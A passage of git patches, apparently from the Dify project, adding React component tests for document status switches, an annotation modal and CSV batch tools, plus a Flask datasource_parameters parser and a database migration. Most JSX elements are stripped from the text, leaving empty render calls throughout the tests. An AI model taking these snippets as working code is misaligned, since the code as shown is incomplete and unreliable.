Arrange & Act + renderWithProviders( + , + ) + + // Assert - visually disabled via CSS classes + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveClass('!cursor-not-allowed', '!opacity-50') + }) + }) + + // ==================== Switch Toggle Tests ==================== + // Test Switch toggle interactions + describe('Switch Toggle', () => { + it('should call enable operation when switch is toggled on', async () => { + // Arrange + const mockOnUpdate = jest.fn() + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockEnableDocument).toHaveBeenCalledWith({ + datasetId: 'dataset-123', + documentId: 'doc-123', + }) + }) + }) + + it('should call disable operation when switch is toggled off', async () => { + // Arrange + const mockOnUpdate = jest.fn() + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockDisableDocument).toHaveBeenCalledWith({ + datasetId: 'dataset-123', + documentId: 'doc-123', + }) + }) + }) + + it('should not call any operation when archived', () => { + // Arrange + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + expect(mockEnableDocument).not.toHaveBeenCalled() + expect(mockDisableDocument).not.toHaveBeenCalled() + }) + + it('should render switch as checked when enabled is true', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - verify switch shows checked state + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveAttribute('aria-checked', 'true') + }) + + it('should render switch as unchecked when enabled is false', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - verify switch shows unchecked state + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveAttribute('aria-checked', 'false') + }) + + it('should skip enable operation when props.enabled is true (guard branch)', () => { + // Covers guard condition: if (operationName === 'enable' && enabled) return + // Note: The guard checks props.enabled, NOT the Switch's internal UI state. + // This prevents redundant API calls when the UI toggles back to a state + // that already matches the server-side data (props haven't been updated yet). + const mockOnUpdate = jest.fn() + renderWithProviders( + , + ) + + const switchEl = screen.getByRole('switch') + // First click: Switch UI toggles OFF, calls disable (props.enabled=true, so allowed) + fireEvent.click(switchEl) + // Second click: Switch UI toggles ON, tries to call enable + // BUT props.enabled is still true (not updated), so guard skips the API call + fireEvent.click(switchEl) + + // Assert - disable was called once, enable was skipped because props.enabled=true + expect(mockDisableDocument).toHaveBeenCalledTimes(1) + expect(mockEnableDocument).not.toHaveBeenCalled() + }) + + it('should skip disable operation when props.enabled is false (guard branch)', () => { + // Covers guard condition: if (operationName === 'disable' && !enabled) return + // Note: The guard checks props.enabled, NOT the Switch's internal UI state. + // This prevents redundant API calls when the UI toggles back to a state + // that already matches the server-side data (props haven't been updated yet). + const mockOnUpdate = jest.fn() + renderWithProviders( + , + ) + + const switchEl = screen.getByRole('switch') + // First click: Switch UI toggles ON, calls enable (props.enabled=false, so allowed) + fireEvent.click(switchEl) + // Second click: Switch UI toggles OFF, tries to call disable + // BUT props.enabled is still false (not updated), so guard skips the API call + fireEvent.click(switchEl) + + // Assert - enable was called once, disable was skipped because props.enabled=false + expect(mockEnableDocument).toHaveBeenCalledTimes(1) + expect(mockDisableDocument).not.toHaveBeenCalled() + }) + }) + + // ==================== onUpdate Callback Tests ==================== + // Test onUpdate callback behavior + describe('onUpdate Callback', () => { + it('should call onUpdate with operation name on successful enable', async () => { + // Arrange + const mockOnUpdate = jest.fn() + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockOnUpdate).toHaveBeenCalledWith('enable') + }) + }) + + it('should call onUpdate with operation name on successful disable', async () => { + // Arrange + const mockOnUpdate = jest.fn() + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockOnUpdate).toHaveBeenCalledWith('disable') + }) + }) + + it('should not call onUpdate when operation fails', async () => { + // Arrange + mockEnableDocument.mockRejectedValue(new Error('API Error')) + const mockOnUpdate = jest.fn() + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'error', + message: 'common.actionMsg.modifiedUnsuccessfully', + }) + }) + expect(mockOnUpdate).not.toHaveBeenCalled() + }) + + it('should not throw when onUpdate is not provided', () => { + // Arrange + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + + // Assert - should not throw + expect(() => fireEvent.click(switchEl)).not.toThrow() + }) + }) + + // ==================== API Calls ==================== + // Test API operations and toast notifications + describe('API Operations', () => { + it('should show success toast on successful operation', async () => { + // Arrange + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'success', + message: 'common.actionMsg.modifiedSuccessfully', + }) + }) + }) + + it('should show error toast on failed operation', async () => { + // Arrange + mockDisableDocument.mockRejectedValue(new Error('Network error')) + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'error', + message: 'common.actionMsg.modifiedUnsuccessfully', + }) + }) + }) + + it('should pass correct parameters to enable API', async () => { + // Arrange + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockEnableDocument).toHaveBeenCalledWith({ + datasetId: 'test-dataset-id', + documentId: 'test-doc-id', + }) + }) + }) + + it('should pass correct parameters to disable API', async () => { + // Arrange + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockDisableDocument).toHaveBeenCalledWith({ + datasetId: 'test-dataset-456', + documentId: 'test-doc-456', + }) + }) + }) + }) + + // ==================== Edge Cases ==================== + // Test boundary conditions and unusual inputs + describe('Edge Cases', () => { + it('should handle empty datasetId', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - should render without errors + expect(screen.getByRole('switch')).toBeInTheDocument() + }) + + it('should handle undefined detail gracefully', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveAttribute('aria-checked', 'false') + }) + + it('should handle empty string id in detail', async () => { + // Arrange + renderWithProviders( + , + ) + + // Act + const switchEl = screen.getByRole('switch') + fireEvent.click(switchEl) + + // Assert + await waitFor(() => { + expect(mockEnableDocument).toHaveBeenCalledWith({ + datasetId: 'dataset-123', + documentId: '', + }) + }) + }) + + it('should handle very long error messages', async () => { + // Arrange + const longErrorMessage = 'A'.repeat(500) + renderWithProviders( + , + ) + + // Act - hover to show tooltip + const tooltipTrigger = screen.getByTestId('error-tooltip-trigger') + fireEvent.mouseEnter(tooltipTrigger) + + // Assert + await waitFor(() => { + expect(screen.getByText(longErrorMessage)).toBeInTheDocument() + }) + }) + + it('should handle special characters in error message', async () => { + // Arrange + const specialChars = ' & < > " \'' + renderWithProviders( + , + ) + + // Act - hover to show tooltip + const tooltipTrigger = screen.getByTestId('error-tooltip-trigger') + fireEvent.mouseEnter(tooltipTrigger) + + // Assert + await waitFor(() => { + expect(screen.getByText(specialChars)).toBeInTheDocument() + }) + }) + + it('should handle all status types in sequence', () => { + // Arrange + const statuses: DocumentDisplayStatus[] = [ + 'queuing', 'indexing', 'paused', 'error', + 'available', 'enabled', 'disabled', 'archived', + ] + + // Act & Assert + statuses.forEach((status) => { + const { unmount } = renderWithProviders() + const indicator = screen.getByTestId('status-indicator') + expect(indicator).toBeInTheDocument() + unmount() + }) + }) + }) + + // ==================== Component Memoization ==================== + // Test React.memo behavior + describe('Component Memoization', () => { + it('should be wrapped with React.memo', () => { + // Assert + expect(StatusItem).toHaveProperty('$$typeof', Symbol.for('react.memo')) + }) + + it('should render correctly with same props', () => { + // Arrange + const props = { + status: 'available' as const, + scene: 'detail' as const, + detail: createDetailProps(), + } + + // Act + const { rerender } = renderWithProviders() + rerender( + + + , + ) + + // Assert + const indicator = screen.getByTestId('status-indicator') + expect(indicator).toBeInTheDocument() + }) + + it('should update when status prop changes', () => { + // Arrange + const { rerender } = renderWithProviders() + + // Assert initial - green/success background + let indicator = screen.getByTestId('status-indicator') + expect(indicator).toHaveClass('bg-components-badge-status-light-success-bg') + + // Act + rerender( + + + , + ) + + // Assert updated - red/error background + indicator = screen.getByTestId('status-indicator') + expect(indicator).toHaveClass('bg-components-badge-status-light-error-bg') + }) + }) + + // ==================== Styling Tests ==================== + // Test CSS classes and styling + describe('Styling', () => { + it('should apply correct status text color for green status', () => { + // Arrange & Act + renderWithProviders() + + // Assert + const statusText = screen.getByText('datasetDocuments.list.status.available') + expect(statusText).toHaveClass('text-util-colors-green-green-600') + }) + + it('should apply correct status text color for red status', () => { + // Arrange & Act + renderWithProviders() + + // Assert + const statusText = screen.getByText('datasetDocuments.list.status.error') + expect(statusText).toHaveClass('text-util-colors-red-red-600') + }) + + it('should apply correct status text color for orange status', () => { + // Arrange & Act + renderWithProviders() + + // Assert + const statusText = screen.getByText('datasetDocuments.list.status.queuing') + expect(statusText).toHaveClass('text-util-colors-warning-warning-600') + }) + + it('should apply correct status text color for blue status', () => { + // Arrange & Act + renderWithProviders() + + // Assert + const statusText = screen.getByText('datasetDocuments.list.status.indexing') + expect(statusText).toHaveClass('text-util-colors-blue-light-blue-light-600') + }) + + it('should apply correct status text color for gray status', () => { + // Arrange & Act + renderWithProviders() + + // Assert + const statusText = screen.getByText('datasetDocuments.list.status.disabled') + expect(statusText).toHaveClass('text-text-tertiary') + }) + + it('should render switch with md size in detail scene', () => { + // Arrange & Act + renderWithProviders( + , + ) + + // Assert - check switch has the md size class (h-4 w-7) + const switchEl = screen.getByRole('switch') + expect(switchEl).toHaveClass('h-4', 'w-7') + }) + }) +}) diff --git a/web/app/components/datasets/documents/status-item/index.tsx b/web/app/components/datasets/documents/status-item/index.tsx index 4ab7246a29..4adb622747 100644 --- a/web/app/components/datasets/documents/status-item/index.tsx +++ b/web/app/components/datasets/documents/status-item/index.tsx @@ -105,6 +105,7 @@ const StatusItem = ({
{errorMessage}
} triggerClassName='ml-1 w-4 h-4' + triggerTestId='error-tooltip-trigger' /> ) } diff --git a/web/app/components/header/indicator/index.tsx b/web/app/components/header/indicator/index.tsx index 8d27825247..d3a49a9714 100644 --- a/web/app/components/header/indicator/index.tsx +++ b/web/app/components/header/indicator/index.tsx @@ -47,6 +47,7 @@ export default function Indicator({ }: IndicatorProps) { return (
Date: Wed, 17 Dec 2025 11:37:55 +0900 Subject: [PATCH 65/68] feat: add datasource_parameters handling for API requests (#29757) Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> --- api/controllers/console/datasets/data_source.py | 14 +++++++++++++- .../data-source/online-documents/index.tsx | 10 ++++++++-- 2 files changed, 21 insertions(+), 3 deletions(-) diff --git a/api/controllers/console/datasets/data_source.py b/api/controllers/console/datasets/data_source.py index 95399fad13..cd958bbb36 100644 --- a/api/controllers/console/datasets/data_source.py +++ b/api/controllers/console/datasets/data_source.py @@ -140,6 +140,18 @@ class DataSourceNotionListApi(Resource): credential_id = request.args.get("credential_id", default=None, type=str) if not credential_id: raise ValueError("Credential id is required.") + + # Get datasource_parameters from query string (optional, for GitHub and other datasources) + datasource_parameters_str = request.args.get("datasource_parameters", default=None, type=str) + datasource_parameters = {} + if datasource_parameters_str: + try: + datasource_parameters = json.loads(datasource_parameters_str) + if not isinstance(datasource_parameters, dict): + raise ValueError("datasource_parameters must be a JSON object.") + except json.JSONDecodeError: + raise ValueError("Invalid datasource_parameters JSON format.") + datasource_provider_service = DatasourceProviderService() credential = datasource_provider_service.get_datasource_credentials( tenant_id=current_tenant_id, @@ -187,7 +199,7 @@ class DataSourceNotionListApi(Resource): online_document_result: Generator[OnlineDocumentPagesMessage, None, None] = ( datasource_runtime.get_online_document_pages( user_id=current_user.id, - datasource_parameters={}, + datasource_parameters=datasource_parameters, provider_type=datasource_runtime.datasource_provider_type(), ) ) diff --git a/web/app/components/datasets/documents/create-from-pipeline/data-source/online-documents/index.tsx b/web/app/components/datasets/documents/create-from-pipeline/data-source/online-documents/index.tsx index b7502f337f..607e4c17ea 100644 --- a/web/app/components/datasets/documents/create-from-pipeline/data-source/online-documents/index.tsx +++ b/web/app/components/datasets/documents/create-from-pipeline/data-source/online-documents/index.tsx @@ -75,11 +75,17 @@ const OnlineDocuments = ({ const getOnlineDocuments = useCallback(async () => { const { currentCredentialId } = dataSourceStore.getState() + // Convert datasource_parameters to inputs format for the API + const inputs = Object.entries(nodeData.datasource_parameters || {}).reduce((acc, [key, value]) => { + acc[key] = typeof value === 'object' && value !== null && 'value' in value ? value.value : value + return acc + }, {} as Record) + ssePost( datasourceNodeRunURL, { body: { - inputs: {}, + inputs, credential_id: currentCredentialId, datasource_type: DatasourceType.onlineDocument, }, @@ -97,7 +103,7 @@ const OnlineDocuments = ({ }, }, ) - }, [dataSourceStore, datasourceNodeRunURL]) + }, [dataSourceStore, datasourceNodeRunURL, nodeData.datasource_parameters]) useEffect(() => { if (!currentCredentialId) return From a93eecaeeee5a74fc3b4af5f677890efcc2739b3 Mon Sep 17 00:00:00 2001 From: FFXN <31929997+FFXN@users.noreply.github.com> Date: Wed, 17 Dec 2025 11:26:08 +0800 Subject: [PATCH 66/68] feat: Add "type" field to PipelineRecommendedPlugin model; Add query param "type" to recommended-plugins api. (#29736) Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> Co-authored-by: Jyong <76649700+JohnJyong@users.noreply.github.com> --- .../rag_pipeline/rag_pipeline_workflow.py | 9 ++++-- ...e_add_type_column_not_null_default_tool.py | 31 +++++++++++++++++++ api/models/dataset.py | 1 + api/services/rag_pipeline/rag_pipeline.py | 13 ++++---- 4 files changed, 45 insertions(+), 9 deletions(-) create mode 100644 api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py diff --git a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py index debe8eed97..46d67f0581 100644 --- a/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py +++ b/api/controllers/console/datasets/rag_pipeline/rag_pipeline_workflow.py @@ -4,7 +4,7 @@ from typing import Any, Literal, cast from uuid import UUID from flask import abort, request -from flask_restx import Resource, marshal_with # type: ignore +from flask_restx import Resource, marshal_with, reqparse # type: ignore from pydantic import BaseModel, Field from sqlalchemy.orm import Session from werkzeug.exceptions import Forbidden, InternalServerError, NotFound @@ -975,6 +975,11 @@ class RagPipelineRecommendedPluginApi(Resource): @login_required @account_initialization_required def get(self): + parser = reqparse.RequestParser() + parser.add_argument("type", type=str, location="args", required=False, default="all") + args = parser.parse_args() + type = args["type"] + rag_pipeline_service = RagPipelineService() - recommended_plugins = rag_pipeline_service.get_recommended_plugins() + recommended_plugins = rag_pipeline_service.get_recommended_plugins(type) return recommended_plugins diff --git a/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py new file mode 100644 index 0000000000..2bdd430e81 --- /dev/null +++ b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py @@ -0,0 +1,31 @@ +"""add type column not null default tool + +Revision ID: 03ea244985ce +Revises: d57accd375ae +Create Date: 2025-12-16 18:17:12.193877 + +""" +from alembic import op +import models as models +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision = '03ea244985ce' +down_revision = 'd57accd375ae' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.add_column(sa.Column('type', sa.String(length=50), server_default=sa.text("'tool'"), nullable=False)) + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.drop_column('type') + # ### end Alembic commands ### diff --git a/api/models/dataset.py b/api/models/dataset.py index ba2eaf6749..445ac6086f 100644 --- a/api/models/dataset.py +++ b/api/models/dataset.py @@ -1532,6 +1532,7 @@ class PipelineRecommendedPlugin(TypeBase): ) plugin_id: Mapped[str] = mapped_column(LongText, nullable=False) provider_name: Mapped[str] = mapped_column(LongText, nullable=False) + type: Mapped[str] = mapped_column(sa.String(50), nullable=False, server_default=sa.text("'tool'")) position: Mapped[int] = mapped_column(sa.Integer, nullable=False, default=0) active: Mapped[bool] = mapped_column(sa.Boolean, nullable=False, default=True) created_at: Mapped[datetime] = mapped_column( diff --git a/api/services/rag_pipeline/rag_pipeline.py b/api/services/rag_pipeline/rag_pipeline.py index 097d16e2a7..f53448e7fe 100644 --- a/api/services/rag_pipeline/rag_pipeline.py +++ b/api/services/rag_pipeline/rag_pipeline.py @@ -1248,14 +1248,13 @@ class RagPipelineService: session.commit() return workflow_node_execution_db_model - def get_recommended_plugins(self) -> dict: + def get_recommended_plugins(self, type: str) -> dict: # Query active recommended plugins - pipeline_recommended_plugins = ( - db.session.query(PipelineRecommendedPlugin) - .where(PipelineRecommendedPlugin.active == True) - .order_by(PipelineRecommendedPlugin.position.asc()) - .all() - ) + query = db.session.query(PipelineRecommendedPlugin).where(PipelineRecommendedPlugin.active == True) + if type and type != "all": + query = query.where(PipelineRecommendedPlugin.type == type) + + pipeline_recommended_plugins = query.order_by(PipelineRecommendedPlugin.position.asc()).all() if not pipeline_recommended_plugins: return { From 5bb1346da857bd955198875fbca6afd591056648 Mon Sep 17 00:00:00 2001 From: Joel Date: Wed, 17 Dec 2025 13:36:40 +0800 Subject: [PATCH 67/68] chore: tests form add annotation (#29770) Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> --- .../edit-item/index.spec.tsx | 53 ++++++ .../add-annotation-modal/index.spec.tsx | 155 ++++++++++++++++++ .../annotation/add-annotation-modal/index.tsx | 2 +- 3 files changed, 209 insertions(+), 1 deletion(-) create mode 100644 web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx create mode 100644 web/app/components/app/annotation/add-annotation-modal/index.spec.tsx diff --git a/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..356f813afc --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,53 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import EditItem, { EditItemType } from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +describe('AddAnnotationModal/EditItem', () => { + test('should render query inputs with user avatar and placeholder strings', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.queryName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toBeInTheDocument() + expect(screen.getByText('Why?')).toBeInTheDocument() + }) + + test('should render answer name and placeholder text', () => { + render( + , + ) + + expect(screen.getByText('appAnnotation.addModal.answerName')).toBeInTheDocument() + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toBeInTheDocument() + expect(screen.getByDisplayValue('Existing answer')).toBeInTheDocument() + }) + + test('should propagate changes when answer content updates', () => { + const handleChange = jest.fn() + render( + , + ) + + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { target: { value: 'Because' } }) + expect(handleChange).toHaveBeenCalledWith('Because') + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..3103e3c96d --- /dev/null +++ b/web/app/components/app/annotation/add-annotation-modal/index.spec.tsx @@ -0,0 +1,155 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import AddAnnotationModal from './index' +import { useProviderContext } from '@/context/provider-context' + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +const mockToastNotify = jest.fn() +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { + notify: jest.fn(args => mockToastNotify(args)), + }, +})) + +jest.mock('@/app/components/billing/annotation-full', () => () =>
) + +const mockUseProviderContext = useProviderContext as jest.Mock + +const getProviderContext = ({ usage = 0, total = 10, enableBilling = false } = {}) => ({ + plan: { + usage: { annotatedResponse: usage }, + total: { annotatedResponse: total }, + }, + enableBilling, +}) + +describe('AddAnnotationModal', () => { + const baseProps = { + isShow: true, + onHide: jest.fn(), + onAdd: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + mockUseProviderContext.mockReturnValue(getProviderContext()) + }) + + const typeQuestion = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder'), { + target: { value }, + }) + } + + const typeAnswer = (value: string) => { + fireEvent.change(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder'), { + target: { value }, + }) + } + + test('should render modal title when drawer is visible', () => { + render() + + expect(screen.getByText('appAnnotation.addModal.title')).toBeInTheDocument() + }) + + test('should capture query input text when typing', () => { + render() + typeQuestion('Sample question') + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('Sample question') + }) + + test('should capture answer input text when typing', () => { + render() + typeAnswer('Sample answer') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('Sample answer') + }) + + test('should show annotation full notice and disable submit when quota exceeded', () => { + mockUseProviderContext.mockReturnValue(getProviderContext({ usage: 10, total: 10, enableBilling: true })) + render() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.add' })).toBeDisabled() + }) + + test('should call onAdd with form values when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + fireEvent.click(screen.getByTestId('checkbox-create-next-checkbox')) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(onAdd).toHaveBeenCalledWith({ question: 'Question value', answer: 'Answer value' }) + }) + + test('should reset fields after saving when create next enabled', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Question value') + typeAnswer('Answer value') + const createNextToggle = screen.getByText('appAnnotation.addModal.createNext').previousElementSibling as HTMLElement + fireEvent.click(createNextToggle) + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + await waitFor(() => { + expect(screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder')).toHaveValue('') + expect(screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder')).toHaveValue('') + }) + }) + + test('should show toast when validation fails for missing question', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.queryRequired', + })) + }) + + test('should show toast when validation fails for missing answer', () => { + render() + typeQuestion('Filled question') + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + + expect(mockToastNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'error', + message: 'appAnnotation.errorMessage.answerRequired', + })) + }) + + test('should close modal when save completes and create next unchecked', async () => { + const onAdd = jest.fn().mockResolvedValue(undefined) + render() + + typeQuestion('Q') + typeAnswer('A') + + await act(async () => { + fireEvent.click(screen.getByRole('button', { name: 'common.operation.add' })) + }) + + expect(baseProps.onHide).toHaveBeenCalled() + }) + + test('should allow cancel button to close the drawer', () => { + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + expect(baseProps.onHide).toHaveBeenCalled() + }) +}) diff --git a/web/app/components/app/annotation/add-annotation-modal/index.tsx b/web/app/components/app/annotation/add-annotation-modal/index.tsx index 274a57adf1..0ae4439531 100644 --- a/web/app/components/app/annotation/add-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/add-annotation-modal/index.tsx @@ -101,7 +101,7 @@ const AddAnnotationModal: FC = ({
- setIsCreateNext(!isCreateNext)} /> + setIsCreateNext(!isCreateNext)} />
{t('appAnnotation.addModal.createNext')}
From 94a5fd3617b0a61865605018f4dcb1399386a76c Mon Sep 17 00:00:00 2001 From: Joel Date: Wed, 17 Dec 2025 13:36:50 +0800 Subject: [PATCH 68/68] chore: tests for webapp run batch (#29767) --- .../run-batch/csv-download/index.spec.tsx | 49 +++++++++++ .../run-batch/csv-reader/index.spec.tsx | 70 +++++++++++++++ .../text-generation/run-batch/index.spec.tsx | 88 +++++++++++++++++++ 3 files changed, 207 insertions(+) create mode 100644 web/app/components/share/text-generation/run-batch/csv-download/index.spec.tsx create mode 100644 web/app/components/share/text-generation/run-batch/csv-reader/index.spec.tsx create mode 100644 web/app/components/share/text-generation/run-batch/index.spec.tsx diff --git a/web/app/components/share/text-generation/run-batch/csv-download/index.spec.tsx b/web/app/components/share/text-generation/run-batch/csv-download/index.spec.tsx new file mode 100644 index 0000000000..45c8d75b55 --- /dev/null +++ b/web/app/components/share/text-generation/run-batch/csv-download/index.spec.tsx @@ -0,0 +1,49 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import CSVDownload from './index' + +const mockType = { Link: 'mock-link' } +let capturedProps: Record | undefined + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: () => { + const CSVDownloader = ({ children, ...props }: React.PropsWithChildren>) => { + capturedProps = props + return
{children}
+ } + return { + CSVDownloader, + Type: mockType, + } + }, +})) + +describe('CSVDownload', () => { + const vars = [{ name: 'prompt' }, { name: 'context' }] + + beforeEach(() => { + capturedProps = undefined + jest.clearAllMocks() + }) + + test('should render table headers and sample row for each variable', () => { + render() + + expect(screen.getByText('share.generation.csvStructureTitle')).toBeInTheDocument() + expect(screen.getAllByRole('row')[0].children).toHaveLength(2) + expect(screen.getByText('prompt share.generation.field')).toBeInTheDocument() + expect(screen.getByText('context share.generation.field')).toBeInTheDocument() + }) + + test('should configure CSV downloader with template data', () => { + render() + + expect(capturedProps?.filename).toBe('template') + expect(capturedProps?.type).toBe(mockType.Link) + expect(capturedProps?.bom).toBe(true) + expect(capturedProps?.data).toEqual([ + { prompt: '', context: '' }, + ]) + expect(screen.getByText('share.generation.downloadTemplate')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/share/text-generation/run-batch/csv-reader/index.spec.tsx b/web/app/components/share/text-generation/run-batch/csv-reader/index.spec.tsx new file mode 100644 index 0000000000..3b854c07a8 --- /dev/null +++ b/web/app/components/share/text-generation/run-batch/csv-reader/index.spec.tsx @@ -0,0 +1,70 @@ +import React from 'react' +import { act, render, screen, waitFor } from '@testing-library/react' +import CSVReader from './index' + +let mockAcceptedFile: { name: string } | null = null +let capturedHandlers: Record void> = {} + +jest.mock('react-papaparse', () => ({ + useCSVReader: () => ({ + CSVReader: ({ children, ...handlers }: any) => { + capturedHandlers = handlers + return ( +
+ {children({ + getRootProps: () => ({ 'data-testid': 'drop-zone' }), + acceptedFile: mockAcceptedFile, + })} +
+ ) + }, + }), +})) + +describe('CSVReader', () => { + beforeEach(() => { + mockAcceptedFile = null + capturedHandlers = {} + jest.clearAllMocks() + }) + + test('should display upload instructions when no file selected', async () => { + const onParsed = jest.fn() + render() + + expect(screen.getByText('share.generation.csvUploadTitle')).toBeInTheDocument() + expect(screen.getByText('share.generation.browse')).toBeInTheDocument() + + await act(async () => { + capturedHandlers.onUploadAccepted?.({ data: [['row1']] }) + }) + expect(onParsed).toHaveBeenCalledWith([['row1']]) + }) + + test('should show accepted file name without extension', () => { + mockAcceptedFile = { name: 'batch.csv' } + render() + + expect(screen.getByText('batch')).toBeInTheDocument() + expect(screen.getByText('.csv')).toBeInTheDocument() + }) + + test('should toggle hover styling on drag events', async () => { + render() + const dragEvent = { preventDefault: jest.fn() } as unknown as DragEvent + + await act(async () => { + capturedHandlers.onDragOver?.(dragEvent) + }) + await waitFor(() => { + expect(screen.getByTestId('drop-zone')).toHaveClass('border-components-dropzone-border-accent') + }) + + await act(async () => { + capturedHandlers.onDragLeave?.(dragEvent) + }) + await waitFor(() => { + expect(screen.getByTestId('drop-zone')).not.toHaveClass('border-components-dropzone-border-accent') + }) + }) +}) diff --git a/web/app/components/share/text-generation/run-batch/index.spec.tsx b/web/app/components/share/text-generation/run-batch/index.spec.tsx new file mode 100644 index 0000000000..26e337c418 --- /dev/null +++ b/web/app/components/share/text-generation/run-batch/index.spec.tsx @@ -0,0 +1,88 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import RunBatch from './index' +import useBreakpoints, { MediaType } from '@/hooks/use-breakpoints' + +jest.mock('@/hooks/use-breakpoints', () => { + const actual = jest.requireActual('@/hooks/use-breakpoints') + return { + __esModule: true, + default: jest.fn(), + MediaType: actual.MediaType, + } +}) + +let latestOnParsed: ((data: string[][]) => void) | undefined +let receivedCSVDownloadProps: Record | undefined + +jest.mock('./csv-reader', () => (props: { onParsed: (data: string[][]) => void }) => { + latestOnParsed = props.onParsed + return
+}) + +jest.mock('./csv-download', () => (props: { vars: { name: string }[] }) => { + receivedCSVDownloadProps = props + return
